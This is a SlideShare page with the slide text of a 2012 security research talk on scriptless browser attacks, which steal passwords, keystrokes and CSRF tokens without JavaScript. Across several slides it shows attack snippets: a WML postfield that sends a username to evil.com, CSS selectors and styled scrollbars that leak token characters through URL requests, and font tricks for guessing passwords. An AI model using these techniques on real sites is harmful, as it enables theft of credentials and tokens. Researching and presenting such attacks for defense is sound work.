SlideShare a Scribd company logo
1 of 52
Download to read offline
(GOT YOUR NOSE)
(How Attackers steal your precious Data without using Scripts)

               A Presentation by Mario Heiderich, 2012
                      (got your nose)
(Our Dear Speaker)

   Mario Heiderich
       Researcher and PhD Student, Ruhr-Uni Bochum
           PhD Thesis on Client Side Security and Defense
       Security Researcher contracting for MS, Redmond
       Security Researcher for SRLabs & Deutsche Post
       Published author and international speaker
           Specialized in HTML5 and SVG Security
           JavaScript, XSS and Client Side Attacks
       FUD Peddler and Prophet of Doom
       HTML5 Security Cheatsheet

                            (got your nose)
(Background)




  (got your nose)
(CrosS)
            (Site Scripting)

   Lots of Talks have been held
   Plenty of Research has been done
       Traditional injections
       Attacks from outer space
       XSS, XAS, XDS, XSSQLI, SWXSS, … you name it!
       Defense mechanisms on multiple layers
       Network, Server, Client and what not...
           CSP, NoScript, AntiSamy and HTMLPurifier, Browser XSS Filters
           mod_security, PHPIDS, some nonsense WAF products
   But why use scripting at all?

                              (got your nose)
(Topics TODAY)


   Scriptless Attacks in your Browser
       Attacks bypassing NoScript
       Attacks bypassing Content Security Policy
       No Scripting allowed
       No Scripting necessary

       Attacks working in Thunderbird
       Attacks stealing your data without XSS

                      (got your nose)
(Offensive Talk)

   We'll mainly see attack vectors today
       Starting simple – using cheap HTTP tricks
       Stealing passwords with CSS
           Almost like the Sexy Assassin back in 2009
           Just without any bruteforcing
       Playing with a user's perception
       Time and Measure, Log and Steal
   Focus is stealing data by using the browser
       Passwords, tokens, sensitive data is general


                            (got your nose)
(The )
(Markup Brothers)




 (SVG Sanchez) (HTML Harry)
      (Clive S Stylesheet)
        (got your nose)
(A river for some)




     (got your nose)
(Defense)

   Defense is possible but tough
       Benign features combined to be attacks
       No possibility to easily build signatures
       Attacker utilizes solicited content
       CSS, SVG images, Links and Images
       No scripting allowed!

       „Thanks for the injection!“
                     (got your nose)
(Happy Injections)




     (got your nose)
(Exploits)

   Three Chapters to be presented

       Chapter 1: The simple tricks
       Chapter 2: Advanced Class
       Chapter 3: For Science!




                   (got your nose)
(Chapter one)




< Those simple Tricks >




      (got your nose)
(Alice and the captcha)


   Let's asume the following situation
       Alice visits a website she frequently uses
       She has a login there, password stored
           Let's further assume her password is „secret“
       The site seems to have a new security feature!
       Now the login needs a CAPTCHA to be solved


       And that is how it looks like!

                         (got your nose)
(CAPCTHA Of doom)




   Seems legit?
   See it live: http://heideri.ch/opera/captcha/
                      (got your nose)
(analysis)

   What really happens
       The attacker, Clive, injects CSS...
           input[type=password]{content:attr(value)}
       Then he includes a custom SVG font
           @font-face {font-family: X;src: url(x.svg#X)
            format("svg");}
       The attacker simply flips characters
           s becomes x, e becomes w, c becomes @ …
       By thinking it's a CAPTCHA...
       … Alice submits her password to the attacker
                          (got your nose)
(validation)




  (got your nose)
(css and regex)
   Old but gold – brute-forcing passwords
       But this time with CSS3 and HTML5
       The secret ingredient here is „validation“
       Brute-force with RegEx!
       Let's have a look
       DEMO


   Good thing it works on all browsers
       Limited by smart password managers though

                      (got your nose)
(Chapter TWO)




< Advanced Class >




   (got your nose)
(I read you)
   Bob is security aware
       His online banking webite? No scripts allowed!
       His browser? Top-up-to-date!
       His emails? PGP SMIME – you name it!
                       ,


   Bob isolates stuff, knows his security
       Even if an attacker XSS'd his bank website...
       Nothing could happen – no JavaScript, Flash or Java


   How can we still pwn Bob then?

                        (got your nose)
(smart bob)




  (got your nose)
(define goals)

   We cannot XSS Bob
   We cannot easily get his cookies
   Neither simply access sensitive data
   But we want his login data



   So we oughta „jack“ the login form!
                 (got your nose)
(WAP Injection)
   If Bob used Opera, we'd have a nice lever




                (got your nose)
(Legit or not)

   Looked legit – or did it?
   So what happened here?
       Opera allows WAP/WML injections
       Thereby we can use WML variables
        
            <go href="//evil.com"><postfield
               name="stolen"
               value="$(username)"/>
       Limited though – XHTML only, Opera only
       Let's have a look: http://html5sec.org/login
                        (got your nose)
(Lucky bob)
   He uses Firefox with NoScript
   ...and Thunderbird with Enigmail
   Unpwnable?




                (got your nose)
Rebuttal

   Let's stay admantine
       And develop a targeted exploit
       Working on Firefox and Thunderbird
       Latest versions, bypassing NoScript


        How can we do that?
       And can we do it at all?
       Let's have a look!
                    (got your nose)
(keylogger)
   Just a harmless login page




   Behaving strange on closer inspection though...
       Let's check that http://html5sec.org/keylogger

                         (got your nose)
(Leaving las vegas)

   If it works in Firefox w/o JavaScript
   Can it also work in...




                  (got your nose)
(thunderbird)

   Mother of God!
   Stealing and exfiltrating keystrokes
   Right in your favorite email client




   Demo time!
                 (got your nose)
(How is it done)

   Attacker injected some inline SVG code
       SVG knows the <set> element
       The <set> element can listen to events
       Even keystrokes
       The feature is called accessKey() (W3C)
       JavaScript is turned off – it's „no script“ anyway
       But the keystroke scope is hard to define

       In Firefox it's the whole document
                      (got your nose)
(thanks svg sanchez)




      Now, what's next?
       (got your nose)
<lets take a breath>




      (got your nose)
(Chapter three)




 < For Science!!! >




     (got your nose)
(CSRF Tokens)
   Everybody knows CSRF
       One domain makes a request to another
       The user is logged into that other domain
       Stuff happens, accounts get modified etc.


   How to we kill CSRF?
       Easily – we use tokens, nonces
       We make sure a request cannot be guessed
       Or brute-forced – good tokens are long and safe

                     (got your nose)
CSRF and XSS

   CSRF and XSS are good friends
       JavaScript can read tokens from the DOM
       Bypass most CSRF protection techniques




       But can we steal CSRF tokens w/o JS?
                    (got your nose)
(Already done)

   SDC, Gaz and thornmaker already did it
   Check out http://p42.us/css/
   They used CSS
       Basically a brute-force via attribute selectors
       input[value^=a]{background:url(?a)}
       If the server catches GET /?a...
       The first character is an a
   But then what?
   There's no „second or Nth character selector“
   They had to go input[value^=aa]{background:url(?aa)}
                          (got your nose)
(effectiveness)

   We're attackers who don't have much
    time!
       So we cannot bruteforce like that
       We need a quicker approach!
       Also, this time we want to attack Webkit :-)


   Let's cook ourselves some crazy CSS!


                    (got your nose)
(ingredients)

   Some links with a secret CSRF token
   A CSS injection
    
        height
    
        width
    
        content:attr(href)
    
        overflow-x:none
    
        font-family
       And another secret ingredient
                      (got your nose)
(DEMO)
   http://html5sec.org/webkit/test




                 (got your nose)
(cooking meth)
   The secret ingredients
       Custom SVG font – one per character
       An animation – decreasing the box size
       The overflow to control scrollbar appearance
       And finally...

       Styled scrollbar elements – Webkit only
        div.s::-webkit-scrollbar-track-piece
        :vertical:increment {background:red url(/s)}

                         (got your nose)
(those fonts)

   There's more we can do with custom fonts
       HTML5 recommends WOFF
       All done via @font-face


   WOFF supports an interesting feature
       Discretionary Ligatures
       Arbitrary character sequences can become one character
       Imagine.. C a t become a cat icon. Or... d e e r a lil' deer



                         (got your nose)
(ligatures)




   http://ie.microsoft.com/testdrive/graphics/opentype/opentype-monotype/index.html

                               (got your nose)
(fontforge)




  (got your nose)
(Attack fonts)
   We can thus build dictionary fonts!
       One character per password for example
       No problem for a font to handle 100k+ items
   Map the string s u p e r s e c r e t into one char
   Make everything else invisible
   If the character is visible, we have a hit
       If not the password is not in the list/font
   But how to activate this ligature feature?
       With CSS3! -moz-font-feature-settings:'calt=0'; -ms-font-feature-
        settings:'calt' 0;


   How can we find out if nothing – or just one char is visible?

                              (got your nose)
(go CSS)
   Remember the smart scrollbars?
       Same thing all over again
       But this time for all browsers please
   CSS Media Queries to the rescue!
       We can deploy selective CSS depending on:
           Viewport width, viewport height
           @media screen and (max-width: 400px){*{foo:bar}}
       Every character gets a distinct width, and/or height
       Once scrollbars appear, the viewport width gets reduced
       By the width of the scrollbar
       Some Iframe tricks do the job and allow universal scrollbar
        detection


   That's all we need _:D

                               (got your nose)
{Demo}




   DEMO

(got your nose)
(the perfect leak)




     (got your nose)
{Almost done}




   (got your nose)
(CONCLUSION I)



Everything is a side-channel nowadays
              (Oh my!)




           (got your nose)
(Conclusion II)

   Scriptless Attacks versus XSS
       Not many differences in impact
       More common injcetion scenarios
       Affecting sandboxes with HTML5
       Information leaks by design
   Hard to detect and fix
   Timing and Side-Channel
   NoScript to the rescue!


                     (got your nose)
(defense)

   How to protect against features?
   How to protect against side-channels
       Reduce data leakage?
       Change standards?
       Build better sandboxes?
       Extend SOP to images and other side channels,
           Use CSP?
       XFO and Framebusters ftw?
       Use NoScript if you can!

                       (got your nose)
(Future work)

   There's a lot more in this
       CSRF, injections and side-channels
       Challenging attacker creativity
       Application and App specific bugs
       Scriptless attacks and mobile devices?


   Exciting times to come without XSS

                    (got your nose)
(The end)

   Questions?
   Discussion?
   Beer?




                  (got your nose)

More Related Content

What's hot

The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG Files
Mario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
Mario Heiderich
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
Mario Heiderich
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
guestad13b55
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Mario Heiderich
 
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
Area41
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill
Mario Heiderich
 

What's hot (20)

The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG Files
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
Secure password - CYBER SECURITY
Secure password - CYBER SECURITYSecure password - CYBER SECURITY
Secure password - CYBER SECURITY
 
Password Security
Password SecurityPassword Security
Password Security
 
Password (in)security
Password (in)securityPassword (in)security
Password (in)security
 
Porting Java To Scala
Porting Java To Scala Porting Java To Scala
Porting Java To Scala
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
 
Password Security
Password SecurityPassword Security
Password Security
 
Passwords presentation
Passwords presentationPasswords presentation
Passwords presentation
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
Symbol GC
Symbol GCSymbol GC
Symbol GC
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
 
An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...
An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...
An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...
 
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
 
P@ssw0rds
P@ssw0rdsP@ssw0rds
P@ssw0rds
 
Roman Sachenko "NodeJS Security or Blackened is The End"
Roman Sachenko "NodeJS Security or Blackened is The End"Roman Sachenko "NodeJS Security or Blackened is The End"
Roman Sachenko "NodeJS Security or Blackened is The End"
 

Viewers also liked

Viewers also liked (6)

Mit Fragen führen im Workshop
Mit Fragen führen im Workshop Mit Fragen führen im Workshop
Mit Fragen führen im Workshop
 
MMT 28: Adobe »Edge to the Flash«
MMT 28: Adobe »Edge to the Flash«MMT 28: Adobe »Edge to the Flash«
MMT 28: Adobe »Edge to the Flash«
 
MMT 30: Windows Phone 7 – Architektur, Frameworks & APIs
MMT 30: Windows Phone 7 – Architektur, Frameworks & APIsMMT 30: Windows Phone 7 – Architektur, Frameworks & APIs
MMT 30: Windows Phone 7 – Architektur, Frameworks & APIs
 
MMT 30: Windows Phone Director’s Cut
MMT 30: Windows Phone Director’s CutMMT 30: Windows Phone Director’s Cut
MMT 30: Windows Phone Director’s Cut
 
MMT 30: Der Weg in den Marketplace
MMT 30: Der Weg in den MarketplaceMMT 30: Der Weg in den Marketplace
MMT 30: Der Weg in den Marketplace
 
MMT 27: »Ja, aber wie genau geht das nun?« – Warum Social Media Alltag geler...
MMT 27: »Ja, aber wie genau geht das nun?«  – Warum Social Media Alltag geler...MMT 27: »Ja, aber wie genau geht das nun?«  – Warum Social Media Alltag geler...
MMT 27: »Ja, aber wie genau geht das nun?« – Warum Social Media Alltag geler...
 

Similar to MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen Daten kommen

Jassa la GeekMeet Bucuresti
Jassa la GeekMeet BucurestiJassa la GeekMeet Bucuresti
Jassa la GeekMeet Bucuresti
alexnovac
 

Similar to MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen Daten kommen (20)

[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?
 
Jassa la GeekMeet Bucuresti
Jassa la GeekMeet BucurestiJassa la GeekMeet Bucuresti
Jassa la GeekMeet Bucuresti
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines
 
Bypassing Web Application Firewalls
Bypassing Web Application FirewallsBypassing Web Application Firewalls
Bypassing Web Application Firewalls
 
XSS Without Browser
XSS Without BrowserXSS Without Browser
XSS Without Browser
 
Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA
 
HTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwordsHTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwords
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Survive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and TricksSurvive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and Tricks
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
 
Ruby in the Browser - RubyConf 2011
Ruby in the Browser - RubyConf 2011Ruby in the Browser - RubyConf 2011
Ruby in the Browser - RubyConf 2011
 
Typescript overview
Typescript overviewTypescript overview
Typescript overview
 
LibreSSL, one year later
LibreSSL, one year laterLibreSSL, one year later
LibreSSL, one year later
 
Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013
 
Offensive MitM
Offensive MitMOffensive MitM
Offensive MitM
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror Stories
 

Recently uploaded

Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptxHarnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
FIDO Alliance
 
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
panagenda
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc
 
CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)
Wonjun Hwang
 

Recently uploaded (20)

JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate Guide
 
WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024
 
Portal Kombat : extension du réseau de propagande russe
Portal Kombat : extension du réseau de propagande russePortal Kombat : extension du réseau de propagande russe
Portal Kombat : extension du réseau de propagande russe
 
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
 
UiPath manufacturing technology benefits and AI overview
UiPath manufacturing technology benefits and AI overviewUiPath manufacturing technology benefits and AI overview
UiPath manufacturing technology benefits and AI overview
 
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptxHarnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
 
WebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM PerformanceWebAssembly is Key to Better LLM Performance
WebAssembly is Key to Better LLM Performance
 
ChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps Productivity
 
Design Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxDesign Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptx
 
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
 
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
 
Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...
Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...
Event-Driven Architecture Masterclass: Engineering a Robust, High-performance...
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptx
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by Anitaraj
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)
 
Top 10 CodeIgniter Development Companies
Top 10 CodeIgniter Development CompaniesTop 10 CodeIgniter Development Companies
Top 10 CodeIgniter Development Companies
 
How we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfHow we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdf
 
Working together SRE & Platform Engineering
Working together SRE & Platform EngineeringWorking together SRE & Platform Engineering
Working together SRE & Platform Engineering
 

MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen Daten kommen

  • 1. (GOT YOUR NOSE) (How Attackers steal your precious Data without using Scripts) A Presentation by Mario Heiderich, 2012 (got your nose)
  • 2. (Our Dear Speaker)  Mario Heiderich  Researcher and PhD Student, Ruhr-Uni Bochum  PhD Thesis on Client Side Security and Defense  Security Researcher contracting for MS, Redmond  Security Researcher for SRLabs & Deutsche Post  Published author and international speaker  Specialized in HTML5 and SVG Security  JavaScript, XSS and Client Side Attacks  FUD Peddler and Prophet of Doom  HTML5 Security Cheatsheet (got your nose)
  • 3. (Background) (got your nose)
  • 4. (CrosS) (Site Scripting)  Lots of Talks have been held  Plenty of Research has been done  Traditional injections  Attacks from outer space  XSS, XAS, XDS, XSSQLI, SWXSS, … you name it!  Defense mechanisms on multiple layers  Network, Server, Client and what not...  CSP, NoScript, AntiSamy and HTMLPurifier, Browser XSS Filters  mod_security, PHPIDS, some nonsense WAF products  But why use scripting at all? (got your nose)
  • 5. (Topics TODAY)  Scriptless Attacks in your Browser  Attacks bypassing NoScript  Attacks bypassing Content Security Policy  No Scripting allowed  No Scripting necessary  Attacks working in Thunderbird  Attacks stealing your data without XSS (got your nose)
  • 6. (Offensive Talk)  We'll mainly see attack vectors today  Starting simple – using cheap HTTP tricks  Stealing passwords with CSS  Almost like the Sexy Assassin back in 2009  Just without any bruteforcing  Playing with a user's perception  Time and Measure, Log and Steal  Focus is stealing data by using the browser  Passwords, tokens, sensitive data is general (got your nose)
  • 7. (The ) (Markup Brothers) (SVG Sanchez) (HTML Harry) (Clive S Stylesheet) (got your nose)
  • 8. (A river for some) (got your nose)
  • 9. (Defense)  Defense is possible but tough  Benign features combined to be attacks  No possibility to easily build signatures  Attacker utilizes solicited content  CSS, SVG images, Links and Images  No scripting allowed!  „Thanks for the injection!“ (got your nose)
  • 10. (Happy Injections) (got your nose)
  • 11. (Exploits)  Three Chapters to be presented  Chapter 1: The simple tricks  Chapter 2: Advanced Class  Chapter 3: For Science! (got your nose)
  • 12. (Chapter one) < Those simple Tricks > (got your nose)
  • 13. (Alice and the captcha)  Let's asume the following situation  Alice visits a website she frequently uses  She has a login there, password stored  Let's further assume her password is „secret“  The site seems to have a new security feature!  Now the login needs a CAPTCHA to be solved  And that is how it looks like! (got your nose)
  • 14. (CAPCTHA Of doom)  Seems legit?  See it live: http://heideri.ch/opera/captcha/ (got your nose)
  • 15. (analysis)  What really happens  The attacker, Clive, injects CSS...  input[type=password]{content:attr(value)}  Then he includes a custom SVG font  @font-face {font-family: X;src: url(x.svg#X) format("svg");}  The attacker simply flips characters  s becomes x, e becomes w, c becomes @ …  By thinking it's a CAPTCHA...  … Alice submits her password to the attacker (got your nose)
  • 16. (validation) (got your nose)
  • 17. (css and regex)  Old but gold – brute-forcing passwords  But this time with CSS3 and HTML5  The secret ingredient here is „validation“  Brute-force with RegEx!  Let's have a look  DEMO  Good thing it works on all browsers  Limited by smart password managers though (got your nose)
  • 18. (Chapter TWO) < Advanced Class > (got your nose)
  • 19. (I read you)  Bob is security aware  His online banking webite? No scripts allowed!  His browser? Top-up-to-date!  His emails? PGP SMIME – you name it! ,  Bob isolates stuff, knows his security  Even if an attacker XSS'd his bank website...  Nothing could happen – no JavaScript, Flash or Java  How can we still pwn Bob then? (got your nose)
  • 20. (smart bob) (got your nose)
  • 21. (define goals)  We cannot XSS Bob  We cannot easily get his cookies  Neither simply access sensitive data  But we want his login data  So we oughta „jack“ the login form! (got your nose)
  • 22. (WAP Injection)  If Bob used Opera, we'd have a nice lever (got your nose)
  • 23. (Legit or not)  Looked legit – or did it?  So what happened here?  Opera allows WAP/WML injections  Thereby we can use WML variables  <go href="//evil.com"><postfield name="stolen" value="$(username)"/>  Limited though – XHTML only, Opera only  Let's have a look: http://html5sec.org/login (got your nose)
  • 24. (Lucky bob)  He uses Firefox with NoScript  ...and Thunderbird with Enigmail  Unpwnable? (got your nose)
  • 25. Rebuttal  Let's stay admantine  And develop a targeted exploit  Working on Firefox and Thunderbird  Latest versions, bypassing NoScript How can we do that?  And can we do it at all?  Let's have a look! (got your nose)
  • 26. (keylogger)  Just a harmless login page  Behaving strange on closer inspection though...  Let's check that http://html5sec.org/keylogger (got your nose)
  • 27. (Leaving las vegas)  If it works in Firefox w/o JavaScript  Can it also work in... (got your nose)
  • 28. (thunderbird)  Mother of God!  Stealing and exfiltrating keystrokes  Right in your favorite email client  Demo time! (got your nose)
  • 29. (How is it done)  Attacker injected some inline SVG code  SVG knows the <set> element  The <set> element can listen to events  Even keystrokes  The feature is called accessKey() (W3C)  JavaScript is turned off – it's „no script“ anyway  But the keystroke scope is hard to define  In Firefox it's the whole document (got your nose)
  • 30. (thanks svg sanchez) Now, what's next? (got your nose)
  • 31. <lets take a breath> (got your nose)
  • 32. (Chapter three) < For Science!!! > (got your nose)
  • 33. (CSRF Tokens)  Everybody knows CSRF  One domain makes a request to another  The user is logged into that other domain  Stuff happens, accounts get modified etc.  How to we kill CSRF?  Easily – we use tokens, nonces  We make sure a request cannot be guessed  Or brute-forced – good tokens are long and safe (got your nose)
  • 34. CSRF and XSS  CSRF and XSS are good friends  JavaScript can read tokens from the DOM  Bypass most CSRF protection techniques  But can we steal CSRF tokens w/o JS? (got your nose)
  • 35. (Already done)  SDC, Gaz and thornmaker already did it  Check out http://p42.us/css/  They used CSS  Basically a brute-force via attribute selectors  input[value^=a]{background:url(?a)}  If the server catches GET /?a...  The first character is an a  But then what?  There's no „second or Nth character selector“  They had to go input[value^=aa]{background:url(?aa)} (got your nose)
  • 36. (effectiveness)  We're attackers who don't have much time!  So we cannot bruteforce like that  We need a quicker approach!  Also, this time we want to attack Webkit :-)  Let's cook ourselves some crazy CSS! (got your nose)
  • 37. (ingredients)  Some links with a secret CSRF token  A CSS injection  height  width  content:attr(href)  overflow-x:none  font-family  And another secret ingredient (got your nose)
  • 38. (DEMO)  http://html5sec.org/webkit/test (got your nose)
  • 39. (cooking meth)  The secret ingredients  Custom SVG font – one per character  An animation – decreasing the box size  The overflow to control scrollbar appearance  And finally...  Styled scrollbar elements – Webkit only div.s::-webkit-scrollbar-track-piece :vertical:increment {background:red url(/s)} (got your nose)
  • 40. (those fonts)  There's more we can do with custom fonts  HTML5 recommends WOFF  All done via @font-face  WOFF supports an interesting feature  Discretionary Ligatures  Arbitrary character sequences can become one character  Imagine.. C a t become a cat icon. Or... d e e r a lil' deer (got your nose)
  • 41. (ligatures)  http://ie.microsoft.com/testdrive/graphics/opentype/opentype-monotype/index.html (got your nose)
  • 42. (fontforge) (got your nose)
  • 43. (Attack fonts)  We can thus build dictionary fonts!  One character per password for example  No problem for a font to handle 100k+ items  Map the string s u p e r s e c r e t into one char  Make everything else invisible  If the character is visible, we have a hit  If not the password is not in the list/font  But how to activate this ligature feature?  With CSS3! -moz-font-feature-settings:'calt=0'; -ms-font-feature- settings:'calt' 0;  How can we find out if nothing – or just one char is visible? (got your nose)
